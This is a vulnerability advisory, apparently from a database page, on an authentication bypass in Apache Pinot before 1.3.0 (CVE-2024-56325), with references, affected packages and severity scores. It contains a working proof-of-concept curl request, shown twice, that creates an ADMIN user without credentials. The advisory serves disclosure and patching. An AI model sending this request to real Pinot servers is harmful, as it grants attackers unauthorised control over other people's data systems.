Описание
Apache Pinot Vulnerable to Authentication Bypass
Authentication Bypass Issue
If the path does not contain / and contain., authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d {"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}
A new user gets added bypassing authentication, enabling the user to control Pinot.
Ссылки
- https://nvd.nist.gov/vuln/detail/CVE-2024-56325
- https://github.com/apache/pinot/pull/14383
- https://github.com/apache/pinot/commit/1b87488aeaf4836e3ef25b426ebbf1ad5a68e68f
- https://github.com/apache/pinot/releases/tag/release-1.3.0
- https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
- http://www.openwall.com/lists/oss-security/2025/03/27/8
Пакеты
org.apache.pinot:pinot-broker
< 1.3.0
1.3.0
org.apache.pinot:pinot-common
< 1.3.0
1.3.0
org.apache.pinot:pinot-controller
< 1.3.0
1.3.0
EPSS
9.3 Critical
CVSS4
9.8 Critical
CVSS3
CVE ID
Дефекты
Связанные уязвимости
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Уязвимость класса AuthenticationFilter OLAP-хранилища данных Apache Pinot, позволяющая нарушителю оказать влияние на конфиденциальность, целостность и доступность защищаемой информации
EPSS
9.3 Critical
CVSS4
9.8 Critical
CVSS3